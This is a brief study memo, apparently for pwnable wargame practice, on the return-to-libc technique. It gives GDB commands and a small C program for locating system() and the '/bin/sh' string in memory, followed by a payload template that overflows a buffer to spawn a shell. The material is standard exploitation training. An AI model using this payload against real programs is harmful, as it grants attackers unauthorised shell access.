[Library / Pwnable] Return To Libc Memo

[System_Addr - GDB]

>b *func

>r

>p system

[Export Exploit_Addr 1]
int main()
{
        unsigned int addr;
        printf("\nSystem Addr : 0x");
        scanf("%x",&addr);
        while(memcmp((void*)addr,"/bin/sh",8))addr++;
        printf("\n<Calculated Result>\nExploit Addr : 0x%x\n\n",addr);

        return 0;

}

[Export Exploit_Addr 2]

>find &system, +99999999, /bin/sh

[Payload Example]

./filename `python -c 'print "\x90"*SizeOfBuf+"System_Addr"+"\x90"*4+"Exploit_Addr"'`